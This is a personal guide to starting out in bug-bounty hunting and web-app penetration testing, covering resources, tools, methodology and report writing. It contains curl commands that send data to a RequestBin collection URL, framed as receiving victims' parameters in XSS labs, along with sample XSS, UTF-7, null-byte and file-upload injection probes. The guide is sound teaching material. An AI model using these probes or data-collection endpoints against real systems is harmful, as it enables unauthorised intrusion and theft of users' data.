How to become a bug-bounty hunter and do penetration testing.          Please send any comments to me.

This page updated: May 2019
      



Becoming a Bug-Bounty Hunter
Focus
Learning
Big Tools / Frameworks
Utilities
Tools / Methodology
Attacks And Vulnerabilities
Attack Tips and Tactics
Miscellaneous



Definitions





Becoming a Bug-Bounty Hunter



Ceos3c's "The different Phases of a Penetration Test"
BugBountyNotes' "Getting started in bugbounties"
Katerina Borodina's "How to Learn Penetration Testing: A Beginners Tutorial"
PTES's "Penetration Testing Execution Standard"
OccupyTheWeb's "Become a Hacker"
Sebastian Vargas's "Different Angles of Cybersecurity"
djadmin / awesome-bug-bounty / Getting Started (huge; don't get lost in here)
Guru99's "Free Ethical Hacking Tutorials: Course for Beginners" (a little stale, but worthwhile)

The usual model is "pay for results": hacker gets paid if they find a problem. Bugcrowd also is rolling out "pay for effort": person gets paid like a contractor/consultant for running tests with a defined coverage and skill level.

Is "pay for results" a fair deal ? Can a bounty-hunter make a living ?
Depends on the competence and intentions of the bounty-hunter (and the following is written from a US perspective): Some grim reading:
Trail of Bits' "On Bounties and Boffins"
Jon Martindale's "Meet the bug bounty hunters making cash by finding flaws before bad guys"
Shaun Waterman's "The bug bounty market has some flaws of its own"
Sean (zseano)'s "Are you submitting bugs for free when others are being paid? Welcome to BugBounties!"
Shaun Nichols' "I won't bother hunting and reporting more Sony zero-days, because all I'd get is a lousy t-shirt"
Gwendal Le Coguic's "Cons of Bug Bounty"
Wladimir Palant's "If your bug bounty program is private, why do you have it?"

"Over 300,000 hackers have signed up on HackerOne; about 1 in 10 have found something to report; of those who have filed a report, a little over a quarter have received a bounty"
from Matt Asay's "Bug bounty programs: Everything you thought you knew is wrong"

Some good news for bug bounty-hunters:




Learn:
You can't learn or know everything, so you'll have to focus on some areas and mostly ignore others, for now.

LiveOverflow's "The Secret step-by-step Guide to learn Hacking" (video)
OccupyTheWeb's "The Essential Skills to Becoming a Master Hacker"

About pentesting as a career-path, from /u/unvivid on reddit 12/2018:

Learn IT Operations/Engineering. Pen testing is about using operations/dev tools in creative ways, about abusing trust relationships. Most people I know that are good/great have background in IT ops and know how to maneuver in those environments. They understand the challenges that operations has and don't beat on them. I'm not saying that people fresh out of school can't become great pentesters, they definitely can -- I know several. But shore up your lack of operational knowledge by building/testing/developing/engineering/Architecting. Don't focus solely on security. Deep dive IT Operations, know how to troubleshoot, know how to sysadmin and engineer networks. Know why things are built wrong/right -- understand what social/political/financial pressures drive companies. Build social skills, learn to communicate and think objectively. That's what gets people into cool jobs. ...

...

... Learn the Windows side, in passing at least. At the highest levels nearly everyone I know is OS agnostic. Yes we all love to sh*t talk MS, but nearly every environment I pentest is 90% Windows. Cloud has changed that somewhat and the winds are shifting. But knowledge of both stacks is good to have. I started my career as a Windows Sysadmin and I'd say that experience was a huge part of what got me into my first security gig. Tons of people love to sh*t on Windows, but it pays the bills and the days of the admin that couldn't script or just clicked through things is coming to an end.

My thoughts:




What are your strengths ?
If you think "I have NO strengths, I'm at ZERO": well, you're using a computer (or phone) to read this page. So you have some device and internet access and some knowledge of how to use that device and the internet. So you're not at ZERO. That device will let you create and edit and view HTML files locally, so you can use it to learn HTML and CSS and Javascript. So, you have a start !



Understand the legalities and rules of engagement:

Interesting list of what is not a bug, in Facebook: Facebook's "Commonly submitted false positives"



Strategies:

To me, the "money" and "security and correctness are important" items generally spell "corporate or govt apps" these days. There aren't going to be big bounties for finding some text-formatting bug in MS Office, or a play-flaw in some game, or bugs in open-source software such as Linux or Node packages. (Except see Julia Reda's "In January, the EU starts running Bug Bounties on Free and Open Source Software".)

The trick probably is to find a target small enough that it hasn't been picked over by a lot of hunters, but big enough to have a bounty program.

Fisher's "[HackerOne] - Prioritizing and choosing a program to focus on"

"Want an easy way to find new bug bounties? Search for the term 'bug bounty' on Indeed or LinkedIn Jobs. You will see public AND private bounty programs."
from tweet by Paul Seekamp.

From /u/cym13 on reddit:

The advice with bug bounties is always the same: look for things nobody else thought of in places nobody else thought of.

It is good practice for websites setting up a bug bounty program to first perform a security assessment of the platform, or at the very least launch automatic detection tools.

Furthermore you're in competition with thousands of other researchers, so finding the obvious is not something you should strive for: if it's obvious, someone else will have found it before you. Maybe you'll be the lucky one but that's a game where there's not always a winner and always thousands of losers.

This means your efforts are best spent:

Success stories including some strategy:
Maycon Vitali's "Talk is cheap. Show me the money!"

I wonder about this: suppose you find a bug in some foundational library or product, such as Electron or libssl ? Can you make reports to N companies who all use that dependency, getting $N from each of them ? [I guess you'd have to show POC for each of them, giving specific URLs and demonstrations for each app.] Or do you just report once to the source of the problem, getting one (smaller or zero) payment from that source ?

A variant of this: find a misconfiguration or misuse of some common library or product, and see if N other companies make the same mistake.



Figure out resources for the given target:
Ceos3c's "The different Phases of a Penetration Test"
Luke Rixson's "Hacking how-to's: Developing your process"
Barrow's "How to Organize Your Tools by Pentest Stages"
Occupy4eles's "Use Magic Tree to Organize Your Projects"
OccupyTheWeb's "The Hacker Methodology"

More about this later (Reconnaissance).



How to report effectively:
More about this later (Reporting).

SheHacksPurple's "Security bugs are fundamentally different than quality bugs"



After reporting:

Your bug will have to be:
  1. triaged,
  2. validated,
  3. evaluated,
  4. fixed,
  5. fix tested,
  6. fix deployed,
  7. then maybe publicized.
Payment may come at any stage. Third parties and Legal may be involved. Be patient. Don't disclose to anyone else without written approval.



What to expect from bug-bounty hunting:
kongwenbin's "A Review of my Bug Hunting Journey"
Marcin Szydlowski's "Inter-application vulnerabilities and HTTP header issues. My summary of 2018 in Bug Bounty programs."
Trail of Bits' "On Bounties and Boffins"
Erin Winick's "Life as a bug bounty hunter: a struggle every day, just to get paid"
phwd's "Respect yourself"
Caleb Kinney's "How to Fail at Bug Bounty Hunting" (video)
Frans Rosen's "Eliminating False Assumptions in Bug Bounties" (video)

More about competition:
I see several Facebook groups full of guys in India, Pakistan, Bangladesh who are running tools and pushing buttons and trying to figure out what they're doing. Probably there are a lot more on Twitter and other places, and from China and Nigeria and Philippines etc.

They have access to the same internet and same tools that you do. If all you learn how to do is run scans and catch very simple bugs, you will be competing with those guys.

Companies are moving to application frameworks instead of lots of custom code. Those frameworks probably do the basics (authentication, input sanitizing, URL-checking, permissions, database access, etc) fairly safely. If all you learn is how to catch simple bugs, you may be pursuing a dwindling pool of bugs.








Focus



You can't do everything, you have to narrow it down.

If your goal is to get a corporate job eventually, focus on areas that will help you get that. Probably not much demand for Wi-Fi cracking or password-cracking skills in corporate jobs.



I'm going to mostly ignore some target areas:



What I'll focus on:

[From this point, everything assumes Web app / database as the focus.]



My personal situation:







Learning



There are so many sites and tools that you can go crazy trying to know about all of them. Find some that work well for you and get started, don't worry about the rest.



Learn from:

Hacking Articles' "Understanding the HTTP Protocol"
Hacking Articles' "Beginner Guide to Understand Cookies and Session Management"

reddit's /r/hacking
reddit's /r/HowToHack
reddit's /r/bugbounty

Some people say: learn from the bottom up, learn the details of protocols and languages and do exploits manually, or else you're just a script-kiddie pushing buttons on tools you don't understand. I say: there's nothing wrong with knowing only some basics and using existing tools. Then iterate up and down, figure out what's really happening when you execute some script, learn more about the language the web app is using, learn more about features of the tool you're using. Push forward your learning on all levels, bit by bit.

Common Terms/Techniques:





Bug-Bounty Programs (and other things to join):

hackerone
Bugcrowd
Intigriti
Portswigger (for their "Web Security Academy")

Thuvarakan Nakarajah's "Bug Bounty Guide"
EdOverflow / bugbounty-cheatsheet / bugbountyplatforms.md
Guru99's "Top 30 Bug Bounty Programs in 2019"
Firebounty (part of Yes We Hack)

Smaller programs may have less competition.

Subscribe to:
Pentester Land's "The 5 Hacking NewsLetter"



Information:

Ceos3c's "What are Payloads in Hacking Lingo?"

If you run into unfamiliar tech, maybe get an intro at:
tutorialspoint's "Tutorials Library"
OverAPI
W3Schools
Rosetta Code's "Category:Programming Tasks" (see same app implemented in N different languages)



Challenges:

I'm focused on single-person mostly-web-app challenges and labs.

CTF (Capture The Flag) challenges tend to be team-based and often in-person and/or within a specified time-period, and more about cracking encryption or binary files or reverse-engineering etc (although some include web apps), I think. I'm not interested in those. Maybe see Capture The Flag 101.


Each challenge could be:

For some challenges, mainly XSS, you need an external web site the victim will access, and a way for you to pick up the params they sent to that site. See External web site section.


[First few are in order I suggest doing them:]
amanhardikar's "Penetration Testing Practice Lab - Vulnerable Apps / Systems" (ignore big image, see lists of sites; huge, don't get lost in here)
Anastasis Vasileiadis' "dvca: Damn Vulnerable Cloud Application"
Anastasis Vasileiadis' "vuLnDAP: A vulnerable LDAP based web app written in Golang"
EdOverflow / bugbounty-cheatsheet / practice-platforms.md
blackMORE Ops' "124 legal hacking websites to practice and learn"

OWASP Vulnerable Web Applications Directory Project (click on tabs across the top of page)
bitvijays's "CTF Series : Vulnerable Machines" (lots of techniques)
"Web Penetration Testing Lab setup" articles in Hacking Articles' "Web Penetration Testing"
CyberX's "Hacking Lab Setup" (more than just lab setup)

Cyber Security Blog (a few walkthroughs)
Hacking Articles' "CTF Challenges" (lots of walkthroughs)

From discussion on reddit 1/2019:
> Real life box vs vulnhub/hackthebox vm
> For those who had real life exp. How similar or different was it?

Some are similar a lot are not. Real world is primarily misconfiguration and out of date software

...

Exactly true. Also, in real life you don't see nearly as many ports exposed as you see on many of these boxes. It's quite rare to see a machine in real life that has 80 and 443 open to the world that also has anything else open like 22, 25, 445 etc.














Big Tools / Frameworks



I'd like to use free tools. Many of the best tools have huge price-tags. The following tools are free unless indicated otherwise.

There are a zillion tools available, and many of them are GUIs or frameworks that call other tools. Many people have just written scripts or GUIs that duplicate other efforts and don't add much value. Some tools have multiple versions, with the really good functionality available only in the very expensive "Pro" version. Some tools were hot 10 years ago and haven't been maintained since then.

[From this point, everything assumes Linux as your test-driver machine.]



The main classes of big tools of interest for web-app testing (I think):
There is lots of overlap, and tools can import/export among each other.



Be careful about just running "try everything" in some big tool, or some script that calls lots of tools. You may hammer your target with lots of port-scanning and attack traffic and brute-forcing, causing alerts to go off at target and your ISP, maybe cause DOS at target, get yourself in trouble.



Browser-proxy and app-logic GUIs:




Vuln-scanners with exploits and payloads:




Automated testing drivers:

Some of the big tools in the previous two sections (such as OWASP ZAP and Metasploit) have APIs and/or CLI interfaces and headless operation that let them be driven as testing engines.

Threadfix.
Minion.



Distros and tool bundles:

My opinion at the moment:
"Number of things installed" does not equal "power". Better to install each tool yourself, so you know something about how it works and what it's doing. And you're probably not going to test all the areas covered by the Kali tools; maybe you'll test web apps, so the tools for Wi-Fi cracking and password brute-forcing and malware reverse-engineering and smartphone-exploitation and such are just distractions. I'm just installing individual tools on Linux Mint and using them there.

From /u/subnetq1:
> So after messing around with Kali, then Kali Light and Black Arch,
> then Arch w/ Black Arch Repos, I was just curious. What are some
> major differences between the latter of the two, or is it just a
> matter of preference? I know there are some obvious differences:
> 1. Kali Light includes xfce, while Arch doesn't really include anything.
> 2. Kali uses apt, Arch uses pacman.

Metasploit is Metasploit whether you run on Arch or Kali, the package manager makes no difference. What you are really buying into when you decide 'black arch' or 'kali' is a set of default configurations, default packages, default desktop environments (all of which are changeable), and a specific support team (how fast will they update packages, and provide new releases, will they do this in a timely manner for your favorite packages?, how well integrated are the packages? Do they consistently work?)

All of this is why you might choose to use a distribution like Kali, or Black Arch, for pentesting. You can install Metasploit or most other common pentesting tools in Ubuntu. But they are not a priority, and may not be updated as frequently, or integration bugs fixed as fast as with Kali or Black Arch - these distributions have a commitment to supporting these packages as "mission essential" for the distribution.








Utilities



Browser:


Browser Add-ons:




External web site to send data to:
For some challenges, mainly XSS, you need an external site the victim will access, and a way for you to pick up the params they sent to that site.

One way to do that is to use RequestBin. Go there in your browser, click on "Create a RequestBin" button, and get an URL with a random token on the end, such as "http://requestbin.fullcontact.com/yvc8t6yv". Have the victim do a GET or POST to that URL, equivalent to:
curl -X POST -d "fizz=buzz" http://requestbin.fullcontact.com/yvc8t6yv
# or
curl -X GET http://requestbin.fullcontact.com/yvc8t6yv\?param1\=5555
Then in browser, go to "http://requestbin.fullcontact.com/yvc8t6yv?inspect" to see the data that came across.

Similar: Webhook.site



Recording your work:

See the Recording Desktop Activity and Recording CLI Activity sections of my Linux page.



Managing the project:

I want something that will:
A lot to ask.

There seem to be a lot of tools for managing N people testing one business.
I want a tool for 1 person testing N businesses/apps.

Refined my thinking a bit, and asked this:
Looking for a test-organizing app for bug-bounty-hunting

I am looking for some "dashboard" app that presents a matrix of combinations: role in app, type of client device, type of client browser, app functional area. Then for each point in the matrix, there are buttons to launch apps such as Burp Suite, OWASP ZAP, Metasploit, nmap. Also buttons to list vulnerabilities found at that point in the matrix.

I would use this to manage my bug-bounty-hunting process. Within each app such as Burp Suite, some operations would be automatic and some manual. But I'm not looking for the test-organizing app to run any of the tests, just to be a dashboard and connect me to the appropriate lower-level apps, probably giving a label such as "normal user, using desktop Firefox, doing login/logout".

Does anything like this exist ? I've looked at a few things, such as OpenVAS. Couldn't get Dradis install to work. Looked at sh00t. I've used Burp Suite and OWASP ZAP and nmap, haven't tried Metasploit yet. Many other apps on my list to install and try.

Does something like Selenium do this ? I don't want to run automated tests, I want to manage the process and point to other tools.

Thanks for any help.

I don't want to replicate any of the port-mapping or page-tracking or report-generating features of big suites such as Burp or ZAP. I want a dashboard where I can see which areas have been covered and which haven't, and click to launch into the appropriate tool to do testing or to see the existing vuln/exploit/report or to see the relevant app pages and documentation pages.
"test matrix application"
"Test management tool"
"requirements traceability matrix"
But I don't need multi-user, I don't need graphs and reports and data analysis, don't need links to version control, don't need build control, trouble tickets.

Mockup1
Actual so far

Ceos3c's "The different Phases of a Penetration Test"
Luke Rixson's "Hacking how-to's: Developing your process"
Barrow's "How to Organize Your Tools by Pentest Stages"
Occupy4eles's "Use Magic Tree to Organize Your Projects"
OccupyTheWeb's "The Hacker Methodology"



Your own OPSEC:

You may create new vulnerabilities in the target. You may create a tunnel that violates all of their security policies. You may see trade secret or proprietary or PII data. Your report is confidential, unless and until the client approves release of it. How are you going to protect those things from someone else coming in and trying to exploit/grab them ?

Assume someone smarter than you is trying to get into the same target that you are, and may be targeting YOU, trying to piggyback on you. Is some new plug-in or script or exploit that you grab from somewhere really safe, does what it says it does, can you trust it ? Are your tools updating themselves over unencrypted connections ?

Have you changed default passwords on Kali, the big tools, etc ? Are you using 2FA on your important online accounts ? Are you storing data in encrypted containers, that are open only when you're using them ?

DEF CON 23 - Wesley McGrew - I Hunt Penetration Testers: More Weaknesses in Tools and Procedures (video)
My "Computer Security and Privacy" page


Probably a bigger risk is that some ISP or big corp might blacklist you:
Mike Felch article (ignore the title)



The main tools I'll be using for web-app testing (I think):







Tools / Methodology



Barrow's "How to Organize Your Tools by Pentest Stages"
Bugcrowd's "Researcher Resources - Tools"
JDow's "Web Application Penetration Testing Cheat Sheet" (misleading title)
OWASP Testing Guide v4 Table of Contents

These are loosely organized into the phases where you'd use them. But many tools straddle several phases. And the exact names and definitions of the phases differ from source to source.

The organization I've chosen:
    [Reconnaissance]

  1. Learn the application: log in as user, do normal things, understand the application.

  2. Domain/server Discovery: OSINT and DNS work to get lists of domains and servers.

  3. Port scanning those domains/servers: scanning to verify domains and servers and ports exist.

  4. Verifying domains/servers/services: scanning to get banner pages etc to show what services are running.

  5. [Analysis]

  6. Site/server Analysis: get software versions and patch levels etc.

  7. Content Discovery: find files on servers.

  8. [Attack]

  9. Probe pages/scripts with bad parameters: attack bad input-handling.

  10. Attack application code and logic: more complicated attacks (XSS, SQLi, etc).

  11. [Cleanup and Reporting]

  12. Remove anything you've installed or modified.

  13. Report what was done and results.

  14. Post-Reporting.




Cautions:
Some tools or techniques are forbidden in some bounty-hunting programs, maybe because they generate so much network traffic or tie up the servers or affect real users.

Use a VPN (unless you're doing custom traffic inside a LAN). Some clients may have automatic software that bans IP addresses that produce suspicious traffic, even if you're authorized to do testing. And it may add your IP to a blacklist that many companies use, not just the target. [This begs the question: are you going to get your VPN company blacklisted ?]

Don't just push the "scan" button on some huge framework and hope the right thing happens. Set the scope and configuration for the scanning, know what it's going to be doing.

From "Penetration Testing" by Georgia Weidman (on Amazon):
"Be forewarned: Not all public exploit code does what it claims to do. Some exploit code may destroy the target system or even attack your system instead of the target. You should always be vigilant when running anything you find online and read through the code carefully before trusting it."

"Scanning for vulns" is not the same as "penetration testing". Scanners make mistakes or give false positives. Follow up each hit with manual testing, and make sure you know what is happening, and try to broaden the scope of the problem. Don't just report scanner results and expect a bounty. Clients often have contracted with expensive pentesting companies that produce huge lists of scanner-hits, but then the client finds only 3 of them are worth fixing.



    [Reconnaissance]

  1. Learn the application:

    [Maybe most of this is more applicable to corporate apps, not consumer apps. But apps are getting more complex all the time.]

    • RTFM. Read sales literature or watch videos. Is there a demo on the target's web site ?

    • Log in to the app, do normal things, understand the application.

    • Maybe diagram the flow and reach of the application. What are the roles, the data, the operations/transactions, the states of the application ? Make a matrix of roles and permissions ? (See ZAP's "session comparison" feature)

    • What is the most valuable information in the application ?
      How important is availability/uptime of the application ?
      Are some parts critical to regulations such as PCI, HIPAA, GDPR, DFARS, COPPA ?
      Where is there money, where is there PII ?
      Is there a privacy policy page ?
      Can users control collection of their data, get a copy of their data, delete their data, delete their account ?

    • Are there things where one user could affect another user ? Such as messaging, creating a new public theme, creating a new store, offering items for sale, commenting on another user's page ?

    • Are there points where a user uploads content (files, notes, comments, URLs, requests, problem reports, themes) into the application ?

    • Try different roles ("authorizations", or "auth-z"s) in the application, different transactions, maybe create multiple users, try deep features that may be less-tested, try unusual features such as password reset, change username, delete account, cancel order. Try desktop and mobile, different human languages, different browsers.

    • What are the default or standard accounts and passwords ? Are there demo or example or admin accounts ? Suppose the installer blindly followed the examples and defaults in the manual, what accounts and passwords and server names would be created ?

    • Are there demo or example pages ? Or a complete example application, that might accidentally been left on the server ?

    • Does the application require that users modify their computers, installing a certificate or app or applet or browser extension, or naming the web-app's domain in a "trusted" security zone of the browser ? What behavior do those things have ? Is there messaging between them ? What kind ?

    • If the application handles internal corporate users as well as public users, are the internal users required to use some ancient browser such as IE6 ? Do they use ActiveX controls ?

    • What technologies and libraries does the application use ? Are some scripts loaded dynamically, as in ad-networks ? Ad code is more likely to have vulnerabilities or provide a path to create a vulnerability in the application.

    • Does the application use old, deprecated technologies, such as Flash or Silverlight ? PDF documents, while not deprecated, have their problems.

    • How is authentication ("auth-n") done, and persisted ? Are there different login points, different types of authentication ? Encryption ? Is there rate-limiting, timeout, lockout ? Rules to enforce strong passwords ? Can usernames be enumerated somehow ?

    • Are there different parts of the application that look different or are built differently ? Are parts of it "legacy" and parts of it new ? Are parts of it free and other parts behind a paywall ? Check how each part is made, and the boundaries between them. How is authentication done, and passed between them ?

    • Are there sub-domains or parts of the application that are listed as "out of scope" for testing ? Maybe they're neglected or full of bugs. You might look at them to see if anything in them might be replicated in the in-scope areas.

    • Is there an issues or to-do list on GitHub or somewhere else ? A forum where users are grousing about problems ? Same for any of the frameworks or major libraries the app is using.

    • Can you install the application locally, on your own machine(s) ? This will make it much easier and safer to learn it, brute-force it, create privileged users, dig into internals and source code, examine log files, etc. Where are the log or audit files ? Is there a master config file ? Is there a debug mode ? Are there hooks or modes for testing ? Where and how are credentials stored ? What OS user is the app server code running as ? How does it update or get patched ? How is it backed up and restored ? How are patches applied ? Are there cron jobs or daemons ? Can you extract version numbers of internal modules, packages or libraries ? Does the app depend on any other services ? Can you install those locally too ?

    • If you can get the source code, you could try running static code-analysis tools on it.

    This is a lot of work. Maybe if you're very good, or very specialized, or feeling reckless, or just looking for a quick score, you can skip much of this learning, and just plunge into the app and see what the pages look like.

    But learning the app may give you a big edge over other hunters, and you may be able to test features they can't get to. If the same app is used by other targets, maybe learning it well is worthwhile. What company wrote this app ? Maybe look at other apps they've written.

    You could always alternate both styles: take a quick shot at the app, read the manual a bit, take another shot, learn more about the app, do some more poking, etc.


  2. Domain/server Discovery:
    OSINT and DNS work to get lists of domains and servers.

    Also see OSINT section.

    [For testing corporate web apps, probably this whole phase is almost useless. The company's bug-bounty program will define a scope that lists the exact domains to be tested.]

    Don't re-invent the wheel, especially when it comes to scanning across the internet. There are a bazillion tools already available. Use Google Search, see Crawler.Ninja, Common Crawl, Shodan, more.

    Fox-IT's "Getting in the Zone: dumping Active Directory DNS using adidnsdump"


  3. Port scanning those domains/servers:
    Scanning to verify domains and servers and ports exist.

    [For testing corporate web apps, probably this whole phase is almost useless. The company's bug-bounty program will declare this out of bounds; they don't want their network or servers bombarded, they want you to find application logic or coding errors.]



    sanspentest's "Web Application Scanning Automation"

    See the "Port scanning and router testing" section of my "Computer Security and Privacy" page.


  4. Verifying domains/servers/services:
    Scanning to get banner pages etc to show what services are running.

    Public Suffix List


  5. [Analysis]

    See Chapter 4 "Mapping the Application" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon).

  6. Site/server Analysis:
    Get software versions and patch levels etc. Get the site headers / policies (htaccess). Are the security settings tight ?

    Also see Web Apps section.

    Once you know what libraries or products the app is using, look for CVEs for those.

    Guru99's "How to Hack a Web Server"
    Anant Shrivastava's "Web Application finger printing"
    David Fletcher's "Finding: Server Supports Weak Transport Layer Security (SSL/TLS)"


  7. Content Discovery:
    Find files on servers.

    Try various user-agent strings; application may have different files for different clients.

    Try logging in as users with various privilege levels; application may have different files for different clients.




  8. [Attack]

  9. Probe pages/scripts with bad parameters:
    Attack bad input-handling.

    Generally, by now (or in earlier phases), you're using a special "intercepting proxy" between you (browser or app) and the network. The proxy supports recording the outgoing requests and the incoming results, and then analyzing them, repeating them, altering them. Some proxies are the one in Burp, OWASP ZAP, Telerik Fiddler.



  10. Attack application code and logic:
    More complicated attacks (XSS, SQLi, etc).

    What is the structure of a web page ? Is the application using frameworks ? Are there iframes ? Is there messaging among parts of a page ? Is data on app server being changed via form posts, or page-gets ? How are sessions identified ?

    A key thing is to track where inputs go to, what they affect. Are they sanitized ? How are special characters handled ? Do inputs change tags on the page ? How are they sent down to the app server ?

    Sanitizing/escaping probably should be done differently for URLs, form fields, and variables. If they're all done the same way, probably one of them is vulnerable.

    If you have accounts with different levels of privilege, try doing all operations as the high-privilege user, then log out, log in as low-privilege user, and replay all the operations (changing session ID or CSRF token to new value).

    See Specific Attacks And Vulnerabilities section.

    OWASP's Xenotix: XSS tester.

    Netsparker ($5K per year)
    Acunetix ($9K)
    Probe.ly (free for VERY limited version, about $500/year for "Starter" version)
    HTTPCS (about $650/year for "Basic" version)
    IronWASP (free; essentially Windows-based; latest release in 2015)

    Try to find the biggest scope for the bug. Multiple browsers, multiple OS's, desktop and mobile, multiple versions, multiple countries, multiple users, etc.



    Tools for specific targets:



  11. [Cleanup and Reporting]

  12. Cleanup of the target system(s):
    Keep good notes, so you can clean up at the end of the testing, or tell the target what was modified.

    If there's something you can't clean up, notify the client/target so they can clean it up.


  13. Reporting:

    • Start building your report as you test, don't leave it all until the end.

    • Don't report results you don't quite understand, from scans, in the hopes that some of them gain a bounty. You don't want to flood the company with false positives or incoherent reports. You need to drill down on each item and get a clear understanding of it.

    • Don't report some picky error or weakness, such as HTTP headers not as tight as they could be.

    • Re-read the allowed scope and known (excluded) vulnerabilities, to make sure your bug is okay.

    • Double-check the bug, run it again from a clean state. If possible, run it in a clean browser with no add-ons and no intercepting proxy. If it's a mobile bug you found through an emulator, re-check using a real device.

    • Target may have a standard form for reporting bugs.

    • Document clearly, with exact URLs and with pictures and video, for both vulnerability and exploit (if separate). Assume that your report will go to some triage person who isn't familiar with the app, then maybe to some junior programmer. Don't rely on technical bug-bounty jargon or assume the developers know it.

    • Document browser, OS, country, language, app version, etc if relevant. Make sure you're on latest browser and OS, no browser add-ons are interfering, if these are relevant.

    • Explain the severity and effects, for both developer and non-technical audiences. Can the attacker steal money or PII ? Create fraudulent orders ? Send messages to other users, to get them to transfer money or give up credentials or PII ? Delete or corrupt or ransomware the database ?

      This is critical; don't report a bug without it. You can't just say "well, I did XSS, your code let me pop up an alert". You have to say "I did XSS and it let me grab THIS private information THIS way".

    • Note the range of the bug. Are all web pages of the app vulnerable in the same way ? Does it affect multiple users ? Does it affect admins ?

    • Maybe refer to standard classifications, such as Bugcrowd's Vulnerability Rating Taxonomy.

    • Maybe note any possible regulatory or legal impacts, but be careful, this is not your area of expertise.

    • Maybe suggest a fix, but be careful, you may not know enough about the app.

    • Don't editorialize or be harsh or advocate an urgent fix; let the facts speak for themselves.

    • You're reporting to busy professionals in a business, who will decide whether to give money to you. Write concisely and professionally, with correct grammar and spelling. Format the report in some reasonable way, with headings and lists as appropriate. Don't waste their time, or use hacker slang, or try to come across as a tough-guy hacker-wizard.

    • It would be nice to have a second person proofread your report and see if they understand it, but maybe that would violate confidentiality.

    • If you've done anything to a production server that you were unable to clean up afterward, explain and give details so the company can clean it up.


    Be especially rigorous in your first few reports, when you're unsure of the process and trying to build a reputation.

    John Stauffacher's "Advice for Writing a Great Vulnerability Report"
    Ryan Satterfield's "How To Write a Proof Of Concept For Security Holes"
    Bugcrowd's "Reporting a Bug"
    Gwendal Le Coguic's "How to write a report"
    ZephrFish / BugBountyTemplates
    Nicholas Handy's "Bug Reporting for Bug Bounties"
    tolo7010's "Writing a good and detailed vulnerability report"
    Bugcrowd University - How to Make a Good Bug Submission (video)
    Melisa Wachs' "DOs and DON’Ts of Pentest Report Writing"
    Pentester Land's "List of bug bounty writeups" (very uneven, more articles than reports, but ...)


  14. Post-Reporting:
    It's possible the target may want to make a fix and then have you re-test.

    Do you have a lot of the target's data saved on your systems ? That is a legal liability to you; you are responsible for protecting it, perhaps to standards dictated by GDPR or some other regulations. Probably best to delete all of it.

    At some point, after ALL is done, you may even want to delete your report, or at least redact it to remove the target's sensitive data from it. What could happen if someone steals it from your system ? What could happen if the data is published (not because of a breach of your system), and there is an investigation of everyone (including you) who possessed that information ?




SecTools.Org (a bit stale)
Pentesting Tutorials' "Pentesting Methodology Tutorial"
EdOverflow / bugbounty-cheatsheet / special-tools.md

OnlineHashCrack (hash identifier)
TunnelsUp's "Hash Analyzer"
CyberChef
psypanda / hashID
Code Beautify (many converters, decryptors, validators)
MD5 conversion and MD5 reverse lookup (MD5 = 32 hex digits)
CrackStation (hash cracker)
Browserling's "Web Developer Tools"
Web Toolkit Online

bugbounty.link: URL-shortener that supports any protocol.
HTTPie: command-line HTTP client.







Attacks And Vulnerabilities



Context:
It's confusing that tools and attacks and exploits often don't make the required context clear. Does a tool / attack / exploit operate:



Resources:
Some apps, tools, attacks, or exploits may require that you have specific resources:





Attack Surfaces:



Attack Targets/Patterns:
It's confusing, because: For example, SQLi:



What you'll do:
Probably you'll:
  1. Start ZAP and Firefox, and browse the application manually for a while.
  2. Use the results recorded in ZAP to tweak ZAP, telling it about such things as session token names and login credentials.
  3. Run scans and attacks in ZAP and see what it reports.
  4. Explore any vulns, through ZAP and manually in the browser.
  5. Start Metasploit and try to exploit vulns.
  6. Run appropriate specific tools, such as sqlmap, WPScan, CMSmap, etc.
  7. Write reports on anything you've found, double-checking manually in a clean setup.
  8. Try to broaden or chain any vulns and exploits.
  9. Learn more about the application.
  10. Review project checklist, see if you've checked everything.
  11. Iterate as needed.

Aakash Choudhary's "Bug-Hunting-Mentality"
ZeroSec's "LTR101: WebAppTesting - Methods to the Madness"
Marcin Szydlowski's "Inter-application vulnerabilities and HTTP header issues. My summary of 2018 in Bug Bounty programs."
bitvijays's "CTF Series : Vulnerable Machines" (lots of techniques)
OWASP's "Category:Attack"
OWASP Testing Guide v4 Table of Contents
Prasanthi Eati's "10 Most Common Web Security Vulnerabilities"
Gwendal Le Coguic's "Vulnerabilities list"

Detectify's "OWASP Top 10 Vulnerabilities Explained"
David Schutzs "OWASP Top 10 Like I'm Five - BSidesBud2019"

You can look at OWASP Top 10 for most common types of vulnerabilities. But look back into the previous years of this list, for some items that have been pushed off the list but still are worth testing.

Sakurity Network's "Why OWASP Top 10 is no longer relevant"




Unsafe Input Handling

Code Injection:
Submit code that gets executed in the context of the application.
Wikipedia's "Code injection"

Submit a script into a Comment field or theme, it gets stored in the database ("stored cross-site scripting"), and later other users can view your "comment" or use your theme. If you can't get a whole script tag in, maybe you can add an attribute such as onFocus or onLoad or onMouseOver to an existing tag.

Examples:
<img src='nosuchfile' onerror='alert(123);' />
<a onmouseover='alert(234);'>alert here</a>
<script>alert(345);</script>
%<script>3cscript%<script>3ealert(1)%<script>3c/script%<script>3e
HTML5 Security Cheatsheet

HTML Injection: Submit HTML into a Comment field or theme, it gets stored in the database, and later other users can view your "comment" or use your theme, and get fooled by your HTML.
Hacking Articles' "Beginner Guide to HTML Injection"

CRLF Injection:
Submit a parameter or request that has an encoded CRLF in the middle of it. Could be useful: Offensive Security by Automation's "Automating CRLF"

Null Byte Injection:
Submit a parameter or request that has an encoded 0 byte (\x00, %00) in the middle of it. Could be useful if the page is taking the parameter and appending more characters (such as ".jpeg") to it. The null byte may cause the additional characters to be ignored.

Most browsers will strip "%00" from URLs, but Burp will let you put them in.

Encoding Sniffing:
Encode characters in some unusual way that the sanitizing code or encoder won't catch, but the browser will interpret in useful ways.

For example, if the page encoding is not specified, older browsers (such as IE8 and earlier) will accept UTF-7 such as:
+ADw-script+AD4-alert(1);+ADw-/script+AD4-
which will survive sanitizing and URL-encoding, but the browser interprets as:
<script>alert(1);</script>

Mark Baggett's "Come to the Dark Side - Python's Sinister Secrets" (PDF slideshow)

File Upload:
If the app has a function that lets a user upload a file to the server, give it filenames that contain "../", or match the name of an existing file (web page or included file) on the server. Give it a valid filename but a dangerous extension (.html, .js, .php, etc).

Or send an HTML file, with name and extension set to something allowed (such as jpeg), but MIME type set to "text/html". If the MIME type gets stored in the database and comes back to the browser later, the browser may use it. [Some older browsers such as IE 6 or 7 may interpret the file as HTML even if the MIME type is set to "image/jpeg", if they see enough HTML inside it. This is called "MIME sniffing".]

